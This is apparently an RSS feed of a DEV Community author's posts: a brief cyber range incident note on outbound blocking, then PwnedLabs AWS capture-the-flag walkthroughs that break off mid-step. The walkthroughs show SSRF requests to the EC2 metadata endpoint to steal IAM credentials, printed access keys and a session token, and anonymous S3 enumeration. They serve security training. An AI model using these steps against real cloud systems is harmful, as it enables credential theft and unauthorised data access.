<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Khang Tran</title>
    <description>The latest articles on DEV Community by Khang Tran (@aktran321).</description>
    <link>https://dev.to/aktran321</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/aktran321"/>
    <language>en</language>
    <item>
      <title>Cyber Range Crypto Attack Incident Response</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Fri, 21 Mar 2025 23:09:04 +0000</pubDate>
      <link>https://dev.to/aktran321/cyber-range-crypto-attack-incident-response-3cgc</link>
      <guid>https://dev.to/aktran321/cyber-range-crypto-attack-incident-response-3cgc</guid>
      <description>&lt;p&gt;Since joining the cyber range community just a week ago, there has already been a security incident where linux virtual machines have been compromised. This is due to machines using the same default credential "labuser:Cyberlab123!".&lt;/p&gt;

&lt;p&gt;Below is the official notice from Azure. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgqqt4xoyebzmsuqfbt6b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgqqt4xoyebzmsuqfbt6b.png" alt="Notice from Azure" width="800" height="1020"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since the purpose of the Cyber Range is to simulate a real world corporate network environment, we still want to allow inbound attacks. &lt;/p&gt;

&lt;p&gt;However, to prevent accidentally or intentionally attacking assets outside the Cyber Range, the following Network Security Group was implemented to block the most common OUTBOUND traffic for ports such as SSH, RDP, SMB and other known crypto miner ports.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdjbztuk4zwpo65451v85.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdjbztuk4zwpo65451v85.png" alt="NSG Blocking OUTBOUND traffic" width="800" height="475"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>SSRF Attack</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Thu, 21 Nov 2024 13:58:49 +0000</pubDate>
      <link>https://dev.to/aktran321/ssrf-attack-1cf6</link>
      <guid>https://dev.to/aktran321/ssrf-attack-1cf6</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flu934o22fo806dxw09yq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flu934o22fo806dxw09yq.png" alt="Image description" width="800" height="554"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://pwnedlabs.io/labs/ssrf-to-pwned" rel="noopener noreferrer"&gt;https://pwnedlabs.io/labs/ssrf-to-pwned&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Scenario
&lt;/h2&gt;

&lt;p&gt;Rumors are swirling on hacker forums about a potential breach at Huge Logistics. Your team has been monitoring these conversations closely, and Huge Logistics has asked you to assess the security of their website. Beyond the surface-level assessment, you're also to investigate links to their cloud infrastructure, mapping out any potential risk exposure. The question isn't just if they've been compromised, but how deep the rabbit hole goes.&lt;/p&gt;

&lt;h5&gt;
  
  
  52.6.119.121 : hugelogistics.pwn
&lt;/h5&gt;

&lt;p&gt;We edit our &lt;code&gt;/etc/hosts&lt;/code&gt; file to map the above ip to the hugelogistic.pwn domain.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo nano /etc/hosts&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx8d10buz3oxt2xuin61z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx8d10buz3oxt2xuin61z.png" alt="Image description" width="800" height="354"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Navigate to &lt;a href="http://hugelogistics.pwn" rel="noopener noreferrer"&gt;http://hugelogistics.pwn&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsmfkyg1pyxlfqqqdpkx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsmfkyg1pyxlfqqqdpkx.png" alt="Image description" width="800" height="343"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can find more information about the organization that owns the IP address&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;whois 52.6.119.121
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We see that the owner is Amazon, but specifically the Amazon EC2 service.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58j1iyv6ihwkr3cr1uxl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58j1iyv6ihwkr3cr1uxl.png" alt="Image description" width="800" height="342"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If we inspect the website, we find that the img tags, and notice that the images are stored in an S3 bucket at &lt;code&gt;https://huge-logistics-storage.s3.amazonaws.com/&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;img src="https://huge-logistics-storage.s3.amazonaws.com/web/images/about.jpg" alt="" class="img-fluid"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This reveals two folders, web and backup.&lt;/p&gt;

&lt;p&gt;Looking back at the website, we find a new page. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55nrtxs7foq0wqht2rk4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55nrtxs7foq0wqht2rk4.png" alt="Image description" width="800" height="202"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inspecting the button with developer tools, we see a form called "name" thats submitted when we click the button, with a default value of "hugelogistics.pwn"&lt;/p&gt;

&lt;p&gt;Clicking the button we see this service status page.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0g31u4z7shwe1hamk97l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0g31u4z7shwe1hamk97l.png" alt="Image description" width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The web app may have made a request to the back-end server to fetch data. This indicates it may be vulnerable to SSRF, Server-Side Request Forgery. &lt;/p&gt;

&lt;p&gt;We assume the website is hosted on an EC2 instance, thus we can attempt an HTTP GET request to the Instance Metadata Service (IMDS) with the private IP 169.254.169.254.&lt;/p&gt;

&lt;p&gt;We replace &lt;code&gt;hugelogisticsstatus.pwn&lt;/code&gt; with &lt;code&gt;169.254.169.254/latest/meta-data&lt;/code&gt; and navigate to&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://hugelogistics.pwn/status/status.php?name=169.254.169.254/latest/meta-data
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhbcpw1nzs0aynhj32vk5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhbcpw1nzs0aynhj32vk5.png" alt="Image description" width="800" height="285"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This command reveals an IAM role &lt;code&gt;MetapwnedS3Access&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://hugelogistics.pwn/status/status.php?name=169.254.169.254/latest/meta-data/iam/info
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87wkiw9yyqecljtl3des.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F87wkiw9yyqecljtl3des.png" alt="Image description" width="800" height="188"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We access the IAM role's credentials.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://hugelogistics.pwn/status/status.php?name=169.254.169.254/latest/meta-data/iam/security-credentials/MetapwnedS3Access
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8cn9ypvv4gehv6x1f30.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8cn9ypvv4gehv6x1f30.png" alt="Image description" width="800" height="157"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws configure
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Access Key: &lt;code&gt;ASIARQVIRZ4UKPLCJVVZ&lt;/code&gt;&lt;br&gt;
Secret Access Key: &lt;code&gt;MfQf6dRXY9q1E2oDX74sqv7ULs3rW9uIu7s4VXE1&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws configure set aws_session_token "&amp;lt;token value&amp;gt;"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Token:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;IQoJb3JpZ2luX2VjEA4aCXVzLWVhc3QtMSJGMEQCIGLKaluB2S92Ar+YUOcyXI8vTgOY+n/AXgYUezfJyBSfAiBc6fVCXR0GBxEiRPPoxkTL80+Tkz4ChUmBx9G2vaCSNyrEBQim//////////8BEAAaDDEwNDUwNjQ0NTYwOCIM7eSp4B/C8Du219mSKpgFUqmhsZ5AiJi3VSVfNIUnitYObN4OUieI7GKuY4xRJqRJWnM7R/UmXgsFSp2K689l+u3z9uhFM6/EEGmccpXvsp4E2XwHPyHGY2KgFByji2Ih8b5oYH8bX4IqidPHOjonOiuvmK+sPkBzV+Cp5Wh3bkmp7oRtHPvHl73TrqM4Q/ZXEkZW1LXyAEsJGvQuotSP2plH7JOzjCgNZf+8ZzySUPeVNtlJjxlqe/nukY/sR375PT2KkjEmru69TN2nzmB9IzGO47UrAAycqwWV7xcSpDU8XQlcwNxoXO+9vnP7jZYKxAym7gbZxFd6EYbf/L1o7xohcG2WzIuZIuPyVtbsmY/XMhQOsCRGqZZecFAxkiKSjlI31cV88AgZoPCU2mzY0lfSpf80MLyR1gk+6wB/copoqI2u2LWGgeyt1UVcqcYS7vLVpaoUik06Caa/4F3vHXhxje8x2eaowdk6bRG59m/XEYkWx/9i1BMiaLrDNRH1Ik6p/um+oaqwxNbZ7TOggpN25bauSxaDBkjHgQ2ORwqm6bDhjoEsKI/YlkadlA7WthssiC1s6DJ0QLW83IvOJ/YFKBkXHYbdgicjD+RKQcAm1u/e3fYR0isb8SeJH6M6Cp9aZ5WFUN37wKj+X4Z05/lkq3JGxmwwN3/paJI/dnj3zs8h6xLViA5V7OOsugB7b+cKqe0pwn4nAEmFvWCD9pZ73rKyItWVpxAtkeN2GVhY2iashzuz8kQmvvIP/VkMoERC6qQQYVuIdjYEI5KN/iqUBSYZSmnG5wCHdhil8z6K/mZapcAUBfZ9WesgXC92dx/XgWaiIfNvxrqO3Kf/a3oW6t+mwZiQgTzc6yuDE8jGVkDV3OUwudJI/LLXhUfoAPCgIHiv2zDj4/y5BjqyAffVg3FjFSCYNM/HqUgzgIas6TOLXp4GEQOpuqlQWyBwPjF41Y8qLJX/a56cnfzSs6RsqCAXvROJM7aV+40wj47B2WmGM2b9HG3b3vN68aNwqTG7cmOh09jeAJvilB8i0Yr+QUHIheg387DUpbc9+vn6JEhOuyHtBzAogJ/tc0oKfiiVTbJP+j81u0wSz8gkiMMoSp0MD7hf9WWNMfenZBzBztmPNGC9Yd6LIBTEpNyWwGo=
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Khangs-MBP:~ khangtran$ aws sts get-caller-identity
{
    "UserId": "AROARQVIRZ4UCHIUOGHDS:i-0199bf97fb9d996f1",
    "Account": "104506445608",
    "Arn": "arn:aws:sts::104506445608:assumed-role/MetapwnedS3Access/i-0199bf97fb9d996f1"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With this new role we can access the bucket and retrieve the flag!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 cp s3://huge-logistics-storage/backup/flag.txt .
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This attack was easily performed because the EC2 instance did not use IMDSv2, which allowed us to access the credentials stored in the metadata of the instance. &lt;/p&gt;

</description>
    </item>
    <item>
      <title>S3 Enumeration</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Thu, 21 Nov 2024 11:58:00 +0000</pubDate>
      <link>https://dev.to/aktran321/s3-enumeration-53hd</link>
      <guid>https://dev.to/aktran321/s3-enumeration-53hd</guid>
      <description>&lt;p&gt;&lt;a href="https://pwnedlabs.io/" rel="noopener noreferrer"&gt;PWNED Labs&lt;/a&gt; is a great resource to get your hands dirty with AWS Penetration Testing. &lt;/p&gt;

&lt;p&gt;Today, I'll be going through the &lt;a href="https://pwnedlabs.io/labs/aws-s3-enumeration-basics" rel="noopener noreferrer"&gt;S3 Enumeration&lt;/a&gt; lab showcasing how easy it is to access an S3 bucket!&lt;/p&gt;

&lt;h2&gt;
  
  
  Scope
&lt;/h2&gt;

&lt;p&gt;It's your first day on the red team, and you've been tasked with examining a website that was found in a phished employee's bookmarks. Check it out and see where it leads! In scope is the company's infrastructure, including cloud services.&lt;/p&gt;

&lt;h2&gt;
  
  
  Target
&lt;/h2&gt;

&lt;p&gt;&lt;a href="http://dev.huge-logistics.com" rel="noopener noreferrer"&gt;http://dev.huge-logistics.com&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxygj8brv39h2njmlmfgj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxygj8brv39h2njmlmfgj.png" alt="Image description" width="800" height="505"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmc0c4ambijqqcqxhqj52.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmc0c4ambijqqcqxhqj52.png" alt="Inspection" width="800" height="239"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can see that the website uses an S3 bucket called dev.huge-logistics.com for storing static files such as images, CSS and Javascript.&lt;/p&gt;

&lt;p&gt;While attempting to access &lt;a href="https://s3.amazonaws.com/dev.huge-logistics.com/" rel="noopener noreferrer"&gt;https://s3.amazonaws.com/dev.huge-logistics.com/&lt;/a&gt; and &lt;a href="https://s3.amazonaws.com/dev.huge-logistics.com/static/" rel="noopener noreferrer"&gt;https://s3.amazonaws.com/dev.huge-logistics.com/static/&lt;/a&gt;, we get an access denied.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh349g32q8bd6oy6mq2li.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh349g32q8bd6oy6mq2li.png" alt="Image description" width="800" height="149"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So we can try accessing using the AWS CLI instead. &lt;/p&gt;

&lt;p&gt;We specifically use the &lt;code&gt;--no-sign-request&lt;/code&gt; flag.&lt;/p&gt;

&lt;p&gt;This flag is synonymous to accessing the bucket anonymously, as you would do if you were trying to access an FTP server that is poorly misconfigured and allowed anonymous sign in. &lt;/p&gt;

&lt;p&gt;Basically, we are enumerating the S3 bucket without having to authenticate ourselves.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 ls s3://dev.huge-logistics.com --no-sign-request
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zi91vxnwxtjg8mco8so.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zi91vxnwxtjg8mco8so.png" alt="Image description" width="800" height="186"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now that we can see the contents of the bucket, we can try recursive enumeration.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 ls s3://dev.huge-logistics.com --no-sign-request --recursive
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But access is denied.&lt;/p&gt;

&lt;p&gt;However, accessing the shared directory works and we find a zip file that we can download.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Khangs-MBP:~ khangtran$ aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
2023-10-16 11:08:33          0
2023-10-16 11:09:01        993 hl_migration_project.zip
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Download&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Unzipping the file reveals a PowerShell script&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fluv3cq0zcv35w622uorg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fluv3cq0zcv35w622uorg.png" alt="Image description" width="760" height="92"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We discover inside the file hardcoded access keys!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Khangs-MBP:~ khangtran$ cat migrate_secrets.ps1
# AWS Configuration
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"
$region = "us-east-1"

# Set up AWS hardcoded credentials
Set-AWSCredentials -AccessKey $accessKey -SecretKey $secretKey

# Set the AWS region
Set-DefaultAWSRegion -Region $region

# Read the secrets from export.xml
[xml]$xmlContent = Get-Content -Path "export.xml"

# Output log file
$logFile = "upload_log.txt"

# Error handling with retry logic
function TryUploadSecret($secretName, $secretValue) {
    $retries = 3
    while ($retries -gt 0) {
        try {
            $result = New-SECSecret -Name $secretName -SecretString $secretValue
            $logEntry = "Successfully uploaded secret: $secretName with ARN: $($result.ARN)"
            Write-Output $logEntry
            Add-Content -Path $logFile -Value $logEntry
            return $true
        } catch {
            $retries--
            Write-Error "Failed attempt to upload secret: $secretName. Retries left: $retries. Error: $_"
        }
    }
    return $false
}

foreach ($secretNode in $xmlContent.Secrets.Secret) {
    # Implementing concurrency using jobs
    Start-Job -ScriptBlock {
        param($secretName, $secretValue)
        TryUploadSecret -secretName $secretName -secretValue $secretValue
    } -ArgumentList $secretNode.Name, $secretNode.Value
}

# Wait for all jobs to finish
$jobs = Get-Job
$jobs | Wait-Job

# Retrieve and display job results
$jobs | ForEach-Object {
    $result = Receive-Job -Job $_
    if (-not $result) {
        Write-Error "Failed to upload secret: $($_.Name) after multiple retries."
    }
    # Clean up the job
    Remove-Job -Job $_
}

Write-Output "Batch upload complete!"


# Install-Module -Name AWSPowerShell -Scope CurrentUser -Force
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can reconfigure our AWS CLI with these keys, which should give us further access to the S3 bucket.&lt;/p&gt;

&lt;p&gt;But lets first check which region the bucket is created in.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl -I https://s3.amazonaws.com/dev.huge-logistics.com/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd72a0xbvbglhwwe2fb07.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd72a0xbvbglhwwe2fb07.png" alt="Image description" width="800" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;us-east-1&lt;/p&gt;

&lt;p&gt;Run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws configure
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And use &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;access-key:&lt;code&gt;AKIA3SFMDAPOWOWKXEHU&lt;/code&gt; &lt;/li&gt;
&lt;li&gt;secret-key: &lt;code&gt;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&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Check our identity&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws sts get-caller-identity
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24plxauelbq0dbccpjxi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24plxauelbq0dbccpjxi.png" alt="Image description" width="770" height="206"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This reveals an IAM user &lt;code&gt;pam-test&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;With these credentials, we are able to access the admin directory, but could not download the flag. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqgzs2cktx0wsol77mdh4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqgzs2cktx0wsol77mdh4.png" alt="Image description" width="800" height="253"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But we were able to reveal more files in the migration-files directory. &lt;/p&gt;

&lt;p&gt;Download the xml file&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cat test-export.xml
